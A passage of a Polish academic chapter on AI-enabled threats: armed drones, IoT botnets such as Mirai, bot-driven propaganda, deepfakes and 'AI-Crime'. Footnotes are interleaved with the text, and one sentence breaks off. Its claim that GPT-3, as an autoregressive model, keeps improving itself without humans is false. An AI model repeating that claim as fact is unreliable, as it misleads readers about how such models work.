Por. Domagała M., Zagrożenia związane z wprowadzeniem pojazdów autonomicznych jako przykład
negatywnych skutków rozwoju sztucznej inteligencji,[w:] Lai L., Świerczyński M. (red.), Prawo sztucznej
inteligencji, CHBeck 2020, s. 239-248
71
Caldwell M., Andrews J.T.A., Tanay T., Griffin L.D., AI-enabled future crime. Crime Science 2020, Vol. 9,
nr 14, https://doi.org/10.1186/s40163-020-00123-8 . Por. także Berdzik T., Bezzałogowe urządzenia pływające
281
Pojazdy autonomiczne potencjalnie pozwoliłyby na ekspansję terroryzmu poprzez
zmniejszenie potrzeby rekrutacji kierowców, umożliwiając pojedynczym sprawcom
przeprowadzanie wielu ataków, a nawet koordynowanie dużej liczby pojazdów
jednocześnie. W 2016 roku Islamskie Państwo Iraku i Lewantu (ISIS) przeprowadziło
swój pierwszy udany atak dronem załadowanym materiałami wybuchowymi, zabijając
dwóch wojowników Peszmergów i ciężko raniąc francuskiego żołnierza w północnym
Iraku
72
. W 2017 r. bojownicy sojuszu Huti-Saleh w zachodnim Jemenie zaatakowali za
pomocą bezzałogowego pojazdu nawodnego należącą do Arabii Saudyjskiej fregatę typu
Al Madinah powodując poważne jej uszkodzenia
73
. W styczniu 2018 r.
niezidentyfikowana syryjska grupa rebeliantów rozmieściła rój 13 dronów domowej
roboty z niewielką amunicją, aby zaatakować rosyjskie bazy w Khmeimim i Tartus,
podczas gdy w sierpniu 2018 r. w zamachu na Nicolasa Maduro z Wenezueli użyto
eksplodujących dronów. Iran i jego pełnomocnicy milicji kilkakrotnie rozmieścili ładunki
wybuchowe przewożone przez drony, w szczególności podczas ataku na saudyjskie
obiekty naftowe w pobliżu wschodniego wybrzeża we wrześniu 2019 roku. W lipcu 2022
r, hiszpańska Guardia Civil przejęła bezzałogowe pojazdy podwodne, o ładowności do
200 kg narkotyków i 10 klasycznych dronów, mogących przewozić do kilkunastu
kilogramów towaru, przygotowanych do przemytu narkotyków przez Cieśninę
Gibraltarską
74
. Wojna rosyjsko – ukraińska szczególnie pokazała możliwości
wykorzystania dronów do atakowania różnych celów. Na Ukrainie, kupione w sklepach
(a więc nie wyprodukowane w celach militarnych), drony kwadrokopterowe są używane
na liniach frontu na wschodzie kraju zarówno przez wojska rządowe, jak i wspieranych
przez Rosję separatystów, głównie w roli rozpoznawczej, pomagając zlokalizować linie
okopów i miejsce dla artylerii, ale też używane są jako bombowce
75
. Autonomiczne
drony pod kontrolą AI na pokładzie potencjalnie pozwalają na większą koordynację i
złożoność ataków, jednocześnie uwalniając sprawcę od konieczności przebywania w
zasięgu nadajnika drona, utrudniając neutralizację i zatrzymanie. Drony mogą być
szczególnie groźne, jeśli działają masowo w samoorganizujących się rojach.
Internet rzeczy (IoT) w połączeniu ze sztuczną inteligencją dodały nowy rodzaj
przestrzeni, w której istnieje ta rzeczywistość — złożone środowiska IoT (complex IoT
i latające jako narzędzie realizacji ataków terrorystycznych – współczesna problematyka, [w:] Dajnowicz-
Piesiecka D., Jurgielewicz-Delegacz E., Pływaczewski E.W. (red.), Prawo karne i kryminologia wobec
kryzysów XXI w., Wolters Kluwer Polska 2022, s. 807-823
72
Gibbons-Neff T., ISIS used an armed drone to kill two Kurdish fighters and wound French troops, report
says, The Washington Post, 11 października 2016,
https://www.washingtonpost.com/news/checkpoint/wp/2016/10/11/isis-used-an-armed-drone-to-kill-two-
kurdish-fighters-and-wound-french-troops-report-says/
73
Cavas C.P., New Houthi weapon emerges: a drone boat, Defense News, 19 lutego 2017,
https://www.defensenews.com/digital-show-dailies/idex/2017/02/19/new-houthi-weapon-emerges-a-drone-
boat/
74
Pasztelański P., Hiszpanie przejęli podwodne drony do przemytu narkotyków, TVP Info, 5 lipca 2022,
https://www.tvp.info/61112795/hiszpania-policja-przejela-podwodne-drony-do-przemytu-narkotykow
75
Wyrwał M., Wojna w Ukrainie. Jak sztuczna inteligencja zabija Rosjan, Onet.pl, 13 lipca 2022,
https://wiadomosci.onet.pl/tylko-w-onecie/rozwiazali-problem-armii-ukrainy-ich-pomysl-okazal-sie-dla-
rosjan-zabojczy/pkzrk0z ; Wyrwał M., Sztuczna inteligencja na wojnie. Jak Ukraińcy odkryli wszystkie
rosyjskie cele, Onet.pl, 13 września 2022, https://www.onet.pl/informacje/onetwiadomosci/sztuczna-
inteligencja-na-wojnie-jak-ukraincy-odkryli-rosyjskie-cele/xljzxkh,79cfc278
282
environments, CIE)
76
. System jest złożony, jeśli jego komponenty lub części oddziałują
dynamicznie na kilka różnych sposobów w oparciu o reguły w tym systemie, z
możliwymi interakcjami niezależnymi od jakichkolwiek instrukcji na wysokim poziomie.
To powoduje, że pojawią się nowe cele i sposoby ataku
77
. Widoczny jest wzrost ilości
botnetów IoT w ostatnich latach (najbardziej zauważalny to atak Mirai
78
i jego pochodna
RapperBot
79
). Możemy sobie wyobrazić jakie skutki wywołałoby przejęcie kontroli lub
wywołanie zakłóceń chociażby w systemach sterowania ruchem w komunikacji
Po trzecie, sztuczna inteligencja jest odpowiedzialna za tworzenie
bezpieczeństwa politycznego, które zagraża podstawowym prawom człowieka, na
przykład sztuczna inteligencja może być wykorzystywana przez polityków, którzy mają
uprawnienia do analizowania masowo gromadzonych danych, partie polityczne mogą
również tworzyć ukierunkowaną propagandę i być odpowiedzialny za przekonywanie
ludzi. Podczas wyborów wymienia się ogromną liczbę fałszywych filmów, a technologia
AI jest wykorzystywana do oszukiwania i rozszerzania zagrożeń związanych z
naruszeniem prywatności i manipulacjami społecznymi.
W ciągu ostatnich dwóch dekad szybki wzrost i przyjęcie reklamy
ukierunkowanej i wspomaganej sztuczna inteligencją radykalnie zmieniły ekosystem
internetowy.
80
Skandal związany z danymi na Facebooku i Cambridge Analytica z uwagi
na metody i kaliber działań – przyniosła do świadomości społecznej wyzwania związane
z celowaniem psychologicznym. Metody analizy danych Cambridge Analytica były w
dużej mierze oparte na pracy naukowej Michała Kosińskiego
81
, który wraz z kolegami
opracował system profilowania, wykorzystujący ogólne dane online, polubienia na
Facebooku i dane ze smartfonów.
Coraz większe znaczenie w cyberprzestrzeni zaczyna odgrywać propaganda
(reklama polityczna) czyli świadome oddziaływanie na odbiorcę, jednostkę lub
zbiorowość poprzez systematyczne rozpowszechnianie określonych poglądów, idei, haseł
76
Por. Wu Q., He K., Chen X., Personalized Federated Learning for Intelligent IoT Applications: A Cloud-
Edge Based Framework, IEEE Open Journal of the Computer Society 2020, vol. 1, s, 35-44, doi:
10.1109/OJCS.2020.2993259; Soret B., Nguyen L.M., Seeger J., Bröring A., Issaid Ch.B., Samarakoon S.,
Gabli El A., Kulkarni V., Bennis M., Popovski P., Learning, Computing, and Trustworthiness in Intelligent
IoT Environments: Performance-Energy Tradeoffs, IEEE Transactions on Green Communications and
Networking 2022, vol. 6, no. 1, s. 629-644, doi: 10.1109/TGCN.2021.3138792; Rego A., Ramírez P.L.G.,
Jimenez J.M., Lloret J., Artificial intelligent system for multimedia services in smart home environments.
Cluster Computing 2022, nr 25, s, 2085–2105, https://doi.org/10.1007/s10586-021-03350-z
77
Por. Romera R., Home Automation and Cybercrime, Trend Micro Inc. 2013,
https://docslib.org/doc/3460117/home-automation-and-cybercrime
78
Botnet, który powstał w 2016 r. Jego celem były publicznie osiągalne urządzenia IoT oparte o system
operacyjny Linux z zainstalowanym pakietem narzędzi uniksowych o nazwie BusyBox oraz otwartym portem
usługi Telnet, przez który następowała infekcja. Szerzej - https://cert.pl/posts/2020/03/analiza-bota-mirai-oraz-
jego-wariantow/
79
Tym co odróżnia go od innych rodzin złośliwego oprogramowania IoT, jest wbudowana zdolność do brute
force danych uwierzytelniających i uzyskiwania dostępu do serwerów SSH zamiast Telnet, jak to zostało
zaimplementowane w Mirai. Ciemski W., Nowy Botnet RapperBot, Security Bez Tabu, 10 sierpnia 2022,
https://securitybeztabu.pl/nowy-botnet-rapperbot/
80
Por. Sumpter D., Osaczeni przez liczby. O algorytmach, które kontrolują nasze życie. Od Facebooka i
Google'a po fake newsy i bańki filtrujące, Copernicus Center Press 2019
81
Por. Redzisz M., Michał Kosiński: Wojnę o prywatność już przegraliśmy, sztucznainteligencja.org.pl, 31
stycznia 2020, https://www.sztucznainteligencja.org.pl/michal-kosinski-wojne-o-prywatnosc-juz-
przegralismy/ ; Żakowski J., Jak politycy wykorzystują algorytmy, by zdobyć nasze głosy, Polityka, 17
stycznia 2017, https://www.polityka.pl/tygodnikpolityka/spoleczenstwo/1690344,1,jak-politycy-
wykorzystuja-algorytmy-by-zdobyc-nasze-glosy.read
283
za pomocą środków perswazji intelektualnej i emocjonalnej (np. symboli, gestów,
obrazów słów, skojarzeń), w celu pozyskania zwolenników i nakłonienia ich do zachowań
pożądanych z punktu widzenia nadawcy
82
. Boty mogą potencjalnie wpływać na opinię
publiczną i wynik wyborów. Na przykład, poprzez retweetowanie
83
określonych treści
lub replikowanie hashtagów
84
, boty społecznościowe mogą być wykorzystywane do
tworzenia wrażenia, że kandydat lub ruch polityczny jest bardziej popularny, oszukując
użytkowników na platformach społecznościowych. Podobną strategią jest astroturfing
85
- proces, który naśladuje działania oddolne, aby stworzyć wrażenie, że polityka lub osoba
ma szerokie poparcie oddolne, gdy istnieje niewielkie lub żadne wsparcie. Boty mogą być
również wykorzystywane do tworzenia postrzegania poparcia dla sprawy w konsultacjach
społecznych i ingerowania w sondaże. Często w działaniach takich wykorzystuje się
dezinformację, czyli weryfikowalne fałszywe lub wprowadzające w błąd informacje,
celowo rozpowszechniane z zamiarem wprowadzenia w błąd lub oszukania odbiorcy.
Dezinformacja staje się poważnym problemem politycznym, a efektami jej działań może
być, przykładowo, kampania nienawiści, podobna do tej przeciwko islamskiej
mniejszości Rohingya w Mjanmie (dawna Birma), rozpętanej w 2017 r. na tamtejszym
Facebooku, w trwającym od 1947 r. konflikcie etnicznym, wykorzystanej przez wojsko
jako pretekst do kolejnych czystek etnicznych
86
. Nieuzasadnione plotki, spekulacje i
celowo fałszywe informacje mogą prowadzić do katastrofalnych konsekwencji,
zwłaszcza w czasach niepewności i niepokojów społecznych, takich jak endemie i
pandemie, czego przykładem są różne akcje antyszczepionkowców i osób
kwestionujących pandemię koronawirusa.
Zestaw narzędzi opartych o AI, wykorzystywanych dla celów manipulacji
strumieniem informacyjnym, jest niezmiernie szeroki. Używane są boty wzorowane na
opracowanym w 1998 r algorytmie PageRank generującym wyniki wyszukiwania Google,
algorytmie Reels - analizującym posty, które użytkownicy polubili, zapisali czy
skomentowali w przeszłości na Instagramie lub stanowiącym najpilniej strzeżoną
tajemnicą Facebooka algorytmie EdgeRank, wyłaniającym trzy generalne zmienne
(Affinity - wskaźnik określający “stopień zażyłości” między publikującym a odbiorcą,
Weight - faworyzowanie treści łatwo przyswajalnych i utrzymujących uwagę, Time
Decay - wskaźnik, który określa odstęp czasu pomiędzy interakcją między jedną a drugą
treścią udostępnioną przez daną stronę), decydujące w logiczny sposób o tym, jakie treści
pojawiają się użytkownikowi portalu. Wykorzystywane są techniki deepfake i syntezy
mowy. Ukończony w sierpniu 2020 roku model GPT-3 (skrót pochodzi od słów
Generative Pre-trained Transformer 3, oznaczający generatywny wstępnie wytrenowany
transformator w wersji trzeciej), będący modelem autoregresyjnym, a więc stale
samodoskonalący bez udziału człowieka. W dużym uproszczeniu GPT przeszukuje
ogromne bazy tekstów szukając tych statystycznie najlepiej odpowiadającym
82
Ciechanowska J., Reklama polityczna. Jej geneza, definicja i funkcje, Zeszyty Naukowe Uniwersytetu
Rzeszowskiego 2011. Seria Prawnicza Prawo 10, Zeszyt 71/2011, s. 39-49
83
Retweetowanie działa jako odpowiedź na tweety (krótka wiadomość w serwisie społecznościowym) z
interfejsu internetowego
84
Hashtag – słowo lub wyrażenie poprzedzone symbolem # (ang. hash), bez użycia spacji, będące formą
znacznika (ang. tag).
85
Por. Łukaszewicz A., Astroturfing - czym jest i czy należy za niego karać, Rzeczpospolita, 28 marca 2018,
https://www.rp.pl/prawo-karne/art2039691-astroturfing-czym-jest-i-czy-nalezy-za-niego-karac
86
Por. Kędzierska W., Lud Rohingya, Kompas Kryzysowy, 24 marca 2021, https://kompaskryzysowy.pl/lud-
rohingya
284
przekazanemu mu zadaniu. "Na przykład, jeśli hasłem będzie „koronawirus” narzędzie
automatycznie wykryje, że bardziej prawdopodobne hasła powiązane z nim to „maseczka”
i „choroba”, odrzuci natomiast znacznie mniej trafne „kwiatki” czy „księżyc”. Ponadto
OpenAI stworzył dwa nowe modele, zwane DALL·E i CLIP, które łączą język i obrazy
w sposób, który sprawia, że sztuczna inteligencja lepiej rozumie zarówno słowa, jak i to,
do czego się odnoszą. Narzędzia takie jak GPT mogą przyspieszyć tworzenie tekstów
pisanych mających na celu dezinformację
87
.
Pojęcie deepfake pojawiło się po raz pierwszy w końcu 2017, a nazwę zaczerpnięto od
pseudonimu użytkownika, który opublikował w serwisie internetowym Reddit
88
linki do
kilku filmów porno zrealizowanych przy użyciu algorytmu uczenia maszynowego z
wykorzystaniem wizerunków m.in. Gal Gadot, Maisie Williams i Taylor Swift
89
. Według
raportu Deeptrace technologia rozwija się bardzo szybko. Na początku 2019 roku w
internecie zaprezentowano 7964 filmów deepfake, dziesięć miesięcy później ich liczba
wynosiła 14678
90
. Fałszywe filmy rozprzestrzeniają się w Internecie, powodując, że
ludzie wierzą w wydarzenia, które nigdy nie miały miejsca, a jednocześnie prawdziwe
filmy są fałszywie uznawane za głębokie podróbki, co powoduje, że ludzie wątpią w
rzeczywistość
91
.
Materiały stworzone za pomocą technologii deepfake można podzielić na :
• rozrywkowe – często mające charakter humorystyczny i dotyczące bohaterów
popkultury lub postaci fikcyjnych, przykład: film z udziałem Kita Haringtona z
popularnego serialu „Gra o tron” (Jon Snow grany przez Haringtona przeprasza za
zakończenie serialu)
92
. Ciekawym przykładem może być także sytuacja z sierpnia 2022
r., kiedy Capitol Records, wytwórnia muzyczna stojąca za kultowymi artystami, ogłosiła,
że podpisała 12 sierpnia 2022 r kontrakt z raperem o imieniu FN Meka. FN Meka nie jest
człowiekiem. Jest wirtualnym awatarem i, co ważniejsze, piosenki Meki z debiutanckiego
87
Por. Witryna internetowa „NotRealNews.net” (obecnie apnews.com) przypominająca stronę główną
witryny informacyjnej pokazuje możliwości wykorzystania sztucznej inteligencji do generowania
dezinformacji - https://apnews.com/hub/not-real-news ; GPT-3, najnowsze dzieło OpenAI, nabrało setki
internautów - artykuły tworzone przez sztuczną inteligencję spotkały się ze świetnym odbiorem
nieświadomych niczego czytelników, Traffic Watchdog, 1 września 2020,
https://trafficwatchdog.pl/pl/articles/58/gpt-3-najnowsze-dzielo-openai-nabralo-setki-internautow-artykuly-
tworzone-przez-sztuczna-inteligencje-spotkaly-sie-ze-swietnym-odbiorem-nieswiadomych-niczego-
czytelnikow ; Goldstein J. A., Sastry G., Musser M., DiResta R., Gentzel M., Sedova K., Generative language
models and automated influence operations: Emerging threats and potential mitigations, 10 stycznia 2023,
https://doi.org/10.48550/arXiv.2301.04246
88
Reddit to serwis internetowy przedstawiający linki do różnorodnych informacji, które ukazały się w sieci.
Serwis jest głównie anglojęzyczny, chociaż jego interfejs jest tłumaczony na wiele języków (w tym polski).
89
Hearing A., Capitol Records forced to drop its artificial-intelligence-created rapper after just one week
following ‘gross stereotypes’ backlash, Fortune, 24 sierpnia 2022, https://fortune.com/2022/08/24/fn-meka-
artificial-intelligence-rapper-dropped-by-capitol-records-gross-stereotypes-backlash/ ;
90
Ajder H., Patrini G, Cavalli F., Cullen L., The State of Deepfakes 2019 Landscape, Threats, and Impact,
September 2019, Deeptrace, https://share.hsforms.com/1cg_h2aPnRrufZeN8HDjWPw3hq83
91
Giansiracusa N., Deepfake Deception. In: How Algorithms Create and Prevent Fake News, Apress,
Berkeley, CA 2021. https://doi.org/10.1007/978-1-4842-7155-1_3 ; Por. także: Wasiuta O., Wasiuta S.,
Deepfake jako skomplikowana i głęboko fałszywa rzeczywistość, Annales Universitatis Paedagogicae
Cracoviensis, Studia de Securitate 2019, nr 9(3), s. 19-30, https://doi.org/10.24917/26578549.9.3.2 ; Zeitchik
S., Ready or not, mass video deepfakes are coming, The Washington Post, 30 sierpnia 2022,
https://www.washingtonpost.com/technology/2022/08/30/deep-fake-video-on-agt/
92
Eadicicco L, Niebezpieczny internetowy trend może przyczynić się do zniszczenia twojej reputacji. Nikt
nie wie, co z nim zrobić, Business Insider, 14 lipca 2019 https://businessinsider.com.pl/technologie/nowe-
technologie/deepfakes-historia-falszywych-filmow-i-pomysly-na-walke-z-nimi/s17z2p0
285
singla „Florida Water” są tworzone przez AI. W kilka dni po wydaniu tego singla, mimo
ogromnego sukcesu komercyjnego (500 000 słuchaczy miesięcznie na Spotify i ponad 10
milionów obserwujących na TikTok) z powodu ostrych reakcji oskarżających FN Meka
o utrwalanie rasistowskich stereotypów oraz głosom, iż AI-artysta został przeszkolony na
prawdziwych piosenkach rapowych, nie dając twórcom tej muzyki jakiejkolwiek
rekompensaty za wykorzystanie ich własności intelektualnej, umowę zerwano
93
.
• edukacyjne – są wykorzystywane między innymi przez instytucje kultury.
Przykłady: w maju 2019 roku za sprawą sztucznej inteligencji „ożywiono” Mona Lisę z
obrazu Leonarda da Vinci. Stało się to możliwe dzięki opracowaniu system
pozwalającego na stworzenie krótkich animacji na podstawie zaledwie jednego
źródłowego kadru. Algorytmy kopiują mimikę, a następnie dzięki specjalnym
znacznikom są w stanie animować nieruchome obrazy i zdjęcia twarzy
94
. Również w
2019 roku Muzeum Salvadora Dalí w St. Petersburgu na Florydzie uruchomiło
ekspozycję "Dali żyje" (Dalí Lives – Art Meets Artificial Intelligence), która dzięki
technologii deepfake umożliwia zwiedzającym rozmowę z artystą i wspólne pozowanie
do zdjęć
95
.
• dezinformacyjne – mają charakter fake newsów, mogą dotyczyć osób
publicznych i wprowadzać odbiorcę w błąd, przykład: w kwietniu 2018 roku serwis
internetowy BuzzFeed zamieścił na swojej stronie film przedstawiający byłego
prezydenta Baracka Obamę wypowiadającego słowa, które w rzeczywistości nigdy nie
padły. Spreparowany cyfrowo Obama mówi między innymi: „Wkraczamy w erę, w której
nasi wrogowie mogą zmusić kogokolwiek do wypowiedzenia dowolnych słów w
dowolnym momencie. (...) To niebezpieczny czas. Musimy dużo bardziej uważać na
internetowe treści”
96
. Niebezpieczne konsekwencje miała także publikacja filmu z
noworocznego orędzia prezydenta Gabonu, Alego Bongo Ondimby. Pojawił się on w sieci
1 stycznia 2019 roku, wywołując falę dezorientacji w kraju. W nietypowo krótkim,
trzyminutowym przemówieniu oczy prezydenta wyglądały dość nienaturalnie, podobnie
jak jego unieruchomione na krześle ciało. Po obejrzeniu filmu wiele osób w Gabonie
myślało, że jest sfałszowany lub zmanipulowany. Kilka dni po upublicznieniu nagrania
oficerowie armii Gabonu uznali jednak, iż film stanowi wystarczający dowód na to, że
Bongo nie nadaje się na prezydenta. W rezultacie zdecydowali się przeprowadzić zamach
stanu, który jednak okazał się nieudany
97
. Przykładowo, w Rosji i na Ukrainie deepfake
były wykorzystywane do manipulowania opinią publiczną poprzez fałszywe filmy
przedstawiające prezydentów tych krajów
98
. Prezydent Ukrainy Wołodymyr Zełenski
93
Hearing A., Capitol Records forced to drop its artificial-intelligence-created rapper after just one week
following ‘gross stereotypes’ backlash, Fortune, 24 sierpnia 2022, https://fortune.com/2022/08/24/fn-meka-
artificial-intelligence-rapper-dropped-by-capitol-records-gross-stereotypes-backlash/
94
Film dostępny pod adresem: https://youtu.be/P2uZF-5F1wI
95
Tomaszkiewicz M., Salvador Dali robi selfie ze zwiedzającymi muzeum, Antyradio,14 maja 2021,
https://www.antyradio.pl/News/Dali-wskrzeszony-dzieki-sztucznej-inteligencji-Jest-eksponatem-w-swoim-
muzeum-i-robi-sobie-selfie-z-goscmi-31723 . Por. także wideo: Behind the Scenes: Dalí Lives, The Dalí
Museum, https://youtu.be/BIDaxl4xqJ4
96
Film dostępny pod adresem: https://youtu.be/cQ54GDm1eL0
97
Joplin T., A Military Coup in Gabon Inspired by a Potential Deepfake Video Is Our Political Future,
Albawaba News, 8 maja 2019, https://www.albawaba.com/news/military-coup-gabon-inspired-potential-
deepfake-video-our-political-future-1284760
98
Wakefield J., Deepfake presidents used in Russia-Ukraine war, bbc.com, 18 marca 2022,
https://www.bbc.com/news/technology-60780142
286
pojawia się za podium, mówiąc Ukraińcom, by odłożyli broń. Inne deepfake wideo
pokazuje prezydenta Rosji Władimira Putina deklarującego pokój. Filmy zostały
następnie szeroko udostępnione w rosyjskojęzycznym Telegramie i rosyjskojęzycznym
odpowiedniku Facebooka - VK. Stamtąd trafiły na platformy takie jak Facebook,
Instagram i Twitter.
• dyskredytacyjne – służą ośmieszeniu, kompromitacji. Mogą być wykorzystane
do ataku, działań kontrowersyjnych lub przestępczych. Przykłady: spowolniony film z
Nancy Pelosi, spikerką Izby Reprezentantów USA, zmontowany tak, by wydawało się,
że Pelosi jest czymś odurzona
99
. W czerwcu 2019 r. wybuchł skandal polityczny wokół
sekstaśmy rzekomo zawierającej ministra gospodarki Malezji Azmina Ali i męskiego
doradcy konkurencyjnego ministra. Aktywność seksualna osób tej samej płci jest w
Malezji nielegalna. Minister przekonywał, że wideo było realistycznie wykonanym
deepfake, aby sabotować jego karierę polityczną
100
.
Sztuczna inteligencja jest szczególnie skutecznym narzędziem dla
cyberprzestępców ze względu na jej zdolność do uczenia się i przewidywania tego, co
dzieje się teraz i co może się wydarzyć w przyszłości. Thomas C. King, Nikita Aggarwal,
Mariarosaria Taddeo i Luciano Floridi w swoim artykule: „An Interdisciplinary Analysis
of Foreseeable Threats and Solutions”
101
zaproponowali termin „AI-Crime”, aby opisać
sytuację, w której technologie sztucznej inteligencji są przeorientowane w celu ułatwienia
działalności przestępczej. AI-Crime skupia się na zachowaniach już określonych jako
przestępcze w ramach danego ustawodawstwa. Inni autorzy proponowali terminy
„szkodliwa sztuczna inteligencja” (harmful AI)
102
i „złośliwa sztuczna inteligencja”
(malevolent AI)
103
. Taís Fernanda Blauth, Oskar Josef Gstrein i Andrej Zwitter
104
posługują się pojęciem „złośliwego wykorzystania i nadużycia” (malicious use and abuse)
sztucznej inteligencji, podobnie jak autorzy raportu „The Malicious Use of Artificial
Intelligence: Forecasting, Prevention, and Mitigation”
105
. Przez „złośliwe użycie”
odnoszą się do wykorzystania sztucznej inteligencji w celu wzmocnienia, rozszerzenia
lub umożliwienia działań popełnionych przez osoby lub organizacje. Obejmuje to
99
Waterson J., Facebook refuses to delete fake Pelosi video spread by Trump supporters, The Guardian, 24
maja 2019, https://www.theguardian.com/technology/2019/may/24/facebook-leavesfake-nancy-pelosi-video-
on-site
100
Blakkarly J., A gay sex tape is threatening to end the political careers of two men in Malaysia, SBS News,
17 czerwca 2019, https://www.sbs.com.au/news/article/a-gay-sex-tape-is-threatening-to-end-the-political-
careers-of-two-men-in-malaysia/ilgqdaqo5
101
King T.C., Aggarwal N., Taddeo M., Floridi L., Artificial Intelligence Crime: An Interdisciplinary
Analysis of Foreseeable Threats and Solutions, Science and Engineering Ethics 2020, nr 26, s. 89-120,
https://doi.org/10.1007/s11948-018-00081-0
102
Hibbard B., Ethical Artificial Intelligence, 2015, https://arxiv.org/pdf/1411.1373 ; Johnson D. G.,
Verdicchio M., Reframing AI discourse, Minds Mach 2017, vol. 27, nr 4, s. 575–590,
https://doi.org/10.1007/s11023-017-9417-6
103
Yampolskiy R.V., Taxonomy of pathways to dangerous AI, w materiałach 2nd International Workshop on
AI, Ethics and Society (AIEthicsSociety2016), Phoenix, 12-13 lutego 2016, s. 143-148,
https://arxiv.org/pdf/1511.03246
104
Blauth T.F., Gstrein O.J., Zwitter A., Artificial Intelligence Crime: An Overview of Malicious Use and
Abuse of AI, IEEE Access 2022, vol. 10, s. 77110-77122, https://doi.org/10.1109/ACCESS.2022.3191790
105
Brundage M., Avin S., Clark J., Toner H., Eckersley P., Garfnkel B., Dafoe A., Scharre P., Zeitzof T., Filar
B., Anderson H., Rof H., Allen G. C., Steinhardt J., Flynn C.,Ó Heighartaigh S., Beard S., Belfeld H.,
Farquhar S., Lyle C., Crootof R., Evans O., Page M., Bryson J., Yampolskiy, R., Amodei D., The Malicious
Use of Artificial Intelligence: Forecasting, Prevention, and Mitigation, Future of Humanity Institute Oxford
U.K., February 2018, https://arxiv.org/ftp/arxiv/papers/1802/1802.07228.pdf
287
praktyki niekoniecznie uznawane za przestępstwa na mocy określonych przepisów, ale
które nadal zagrażają bezpieczeństwu osób, organizacji i instytucji publicznych
106
. Przez
„złośliwe nadużycie” odnoszą się do wykorzystywania sztucznej inteligencji w złych
intencjach, a także ataków na same systemy sztucznej inteligencji.
Uczestnicy, odbytych w lutym 2019 r. z udziałem przedstawicieli środowisk
akademickich, policji, obrony, rządu i sektora prywatnego, warsztatów na temat „AI &
Future Crime”, zorganizowanych przez Dawes Center for Future Crimes w University
College London, zidentyfikowali 20 różnych potencjalnych przyszłych przestępstw
wykorzystujących sztuczną inteligencję
107
. Wraz ze wzrostem możliwości i wdrażania
technologii sztucznej inteligencji rośnie ryzyko wykorzystania przestępczego.
Możliwości przestępczości opartej na sztucznej inteligencji istnieją zarówno w sferze
pokrywającej się z tradycyjnymi pojęciami cyberbezpieczeństwa i cyberprzestępczości,
jak i w szerszym znaczeniu. Niektóre z tych zagrożeń pojawiają się jako rozszerzenie
istniejącej działalności przestępczej, podczas gdy inne mogą być nowatorskie. Zauważyli
przy tym, iż sztuczną inteligencję można wykorzystywać do celów przestępczych na
wiele sposobów, które nie wykluczają się wzajemnie:
• Jako narzędzie przestępstwa, w którym sztuczna inteligencja jest
wykorzystywana do popełniania tradycyjnych przestępstw, wykorzystując jej możliwości
do ułatwiania działań przeciwko rzeczywistym celom: przewidywania zachowań osób
lub instytucji w celu wykrywania i wykorzystywania słabych punktów; generowanie
fałszywych treści do wykorzystania w szantażu lub w celu splamienia reputacji;
dokonywanie wyczynów, których ludzcy sprawcy nie są w stanie lub nie chcą zrobić sami,
z powodu niebezpieczeństwa, wielkości fizycznej, szybkości reakcji itp. Chociaż metody
są nowe, same przestępstwa mogą być tradycyjnego rodzaju – takie jak kradzież,
zastraszanie lub terror.
• Jako cel działalności przestępczej, gdzie systemy AI są na celowniku
przestępców – np. próby obchodzenia systemów ochronnych, które stanowią przeszkodę
dla przestępstwa, unikanie wykrycia lub ścigania za przestępstwa już popełnione,
sprawianie, że zaufane lub krytyczne systemy zawodzą lub zachowują się nieprawidłowo
w celu spowodowania szkód lub podważenia zaufania publicznego.
• Jako kontekst przestępstwa, gdzie nieuczciwe działania mogą zależeć od
przekonania ofiary, że niektóre funkcje sztucznej inteligencji (takie jak przewidywanie
rynków akcji lub manipulowanie wyborcami) są możliwe, nawet jeśli tak nie jest.
106
Tak samo: Brundage M., Avin S., Clark J., Toner H., Eckersley P., Garfnkel B., Dafoe A., Scharre P.,
Zeitzof T., Filar B., Anderson H., Rof H., Allen G. C., Steinhardt J., Flynn C.,Ó Heighartaigh S., Beard S.,
Belfeld H., Farquhar S., Lyle C., Crootof R., Evans O., Page M., Bryson J., Yampolskiy, R., Amodei D., The
Malicious Use of Artificial Intelligence: Forecasting, Prevention, and Mitigation, Future of Humanity Institute
Oxford U.K., February 2018, https://arxiv.org/ftp/arxiv/papers/1802/1802.07228.pdf ; Ciancaglini V. Gibson
C., Sancho D., Malicious uses and abuses of artificial intelligence, Trend Micro Research; United Nations
Interregional Crime and Justice Research Institute (UNICRI); Europol’s European Cybercrime Centre (EC3),
6 grudnia 2021,
https://www.europol.europa.eu/cms/sites/default/files/documents/malicious_uses_and_abuses_of_artificial_int
elligence_europol.pdf ; Yampolskiy R.V., Taxonomy of pathways to dangerous AI, w materiałach 2nd
International Workshop on AI, Ethics and Society (AIEthicsSociety2016), Phoenix, 12-13 lutego 2016, s. 143-
148, https://arxiv.org/pdf/1511.03246 ; Zouave E., Bruce M., Colde K., Jaitner M., Rodhe I., Gustafsson T.,
Artificially intelligent cyberattacks, Total Defense Research Institute FOI 2020,
https://www.statsvet.uu.se/digitalAssets/769/c_769530-l_3-k_rapport-foi-vt20.pdf
107
Caldwell M., Andrews J.T.A., Tanay T., Griffin L.D., AI-enabled future crime. Crime Science 2020, Vol.
9, nr 14, https://doi.org/10.1186/s40163-020-00123-8
288
Jak bardzo celnie zauważają autorzy raportu z warsztatów UCL „stopień, w jakim ta
różnorodność czynów przestępczych może zostać zwiększona za pomocą sztucznej
inteligencji, zależy w znacznym stopniu od tego, jak bardzo są one osadzone w środowisku
obliczeniowym: robotyka szybko się rozwija, ale sztuczna inteligencja lepiej nadaje się
do udziału w oszustwie bankowym niż w bójce w pubie. Ta preferencja dla świata
cyfrowego, a nie fizycznego, jest jednak słabą obroną, ponieważ współczesne
społeczeństwo jest głęboko zależne od złożonych sieci obliczeniowych, nie tylko w
zakresie finansów i handlu, ale także wszystkich form komunikacji, polityki, wiadomości,
pracy i relacji społecznych”
108
. Matthew Caldwell z UCL, jeden z autorów raportu,
stwierdził: „W przeciwieństwie do wielu tradycyjnych przestępstw, przestępstwa w sferze
cyfrowej można łatwo udostępniać, powtarzać, a nawet sprzedawać, umożliwiając
wprowadzanie technik przestępczych na rynek i dostarczanie przestępstw jako usługi.
Oznacza to, że przestępcy mogą być w stanie zlecić na zewnątrz trudniejsze aspekty swojej
przestępczości opartej na sztucznej inteligencji”
109
. Urynkowienie przestępczości opartej
na sztucznej inteligencji i powstanie „AI Crime -as-a-Service” stało się już faktem i na
różnych darknetowych forach coraz więcej jest nie tylko dyskusji o możliwościach
wykorzystania narzędzi przestępczych opartych o algorytmy AI, ale także konkretnych
ofert.
PODSUMOWANIE
Sztuczna inteligencja (AI) pozwala uporządkować i wydobyć sens z olbrzymiej
ilości danych, przyspieszając innowacje i transformację cyfrową. AI opiera się na
